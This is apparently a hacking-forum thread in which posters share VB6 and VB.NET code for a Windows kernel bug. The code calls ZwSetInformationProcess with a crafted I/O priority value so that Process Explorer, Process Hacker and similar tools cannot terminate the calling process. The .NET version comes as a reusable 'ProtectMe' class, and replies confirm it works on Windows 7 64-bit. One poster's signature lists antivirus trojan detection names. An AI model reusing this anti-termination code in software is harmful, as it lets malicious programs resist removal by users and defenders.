Well, I was browsing the web and saw a very good bug found by waleedassar, and I implemented it in VB6.
'Pink/Danyfirex
'All Credits http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html


Private Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Private Declare Function ZwSetInformationProcess Lib "ntdll.dll" (ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long



Private Sub Form_Load()
ZwSetInformationProcess GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&
End Sub

Regards
On Windows 8 64-bit it didn't work for me; can anyone else check?

Appearances are deceiving.
Works on Windows 7 64-bit, very good, Pink.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
In .NET:
'By Rottweiler
Imports System.Runtime.InteropServices
 
Public Class ProtectMe
#Region "VarPtr Support by Francesco Balena & Code Architects"
    ' -----------------------------------------------------------
    ' VARPTR implementation in VB.NET
    ' Part of VB Migration Partner’s support library
    '
    ' Copyright © 2009, Francesco Balena & Code Architects
    ' -----------------------------------------------------------
    Private Delegate Function VarPtrCallbackDelegate(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Short, _
       ByVal unused1 As Integer, ByVal unused2 As Integer, _
       ByVal unused3 As Integer) As Integer
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal wndProc As VarPtrCallbackDelegate, ByRef var As Integer, _
       ByVal unused1 As Integer, ByVal unused2 As Integer, _
       ByVal unused3 As Integer) As Integer
    Private Shared Function VarPtrCallback(ByVal address As Integer, ByVal unused1 As Integer, ByVal unused2 As Integer, ByVal unused3 As Integer) As Integer
        Return address
    End Function
    Private Shared Function VarPtr(ByRef var As Short) As Integer
        Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
    End Function
    Private Shared Function VarPtr(ByRef var As Integer) As Integer
        Return CallWindowProc(AddressOf VarPtrCallback, var, 0, 0, 0)
    End Function
#End Region
 
    <DllImport("Kernel32.dll")>
    Private Shared Function GetCurrentProcess() As IntPtr
    End Function
 
    <DllImport("ntdll.dll")>
    Private Shared Function ZwSetInformationProcess(ByVal _1 As IntPtr, ByVal _2 As IntPtr, ByVal _3 As IntPtr, ByVal _4 As IntPtr) As IntPtr
    End Function
 
    Public Shared Sub Protect()
        ZwSetInformationProcess(GetCurrentProcess(), &H21&, VarPtr(&H8000F129), &H4&)
    End Sub
End Class

Regards
ZeRiito wrote: It's a bug? What are you referring to, friend?

So neither Process Explorer nor Process Hacker nor other such tools
will let me close the process?
Exactly.

Regards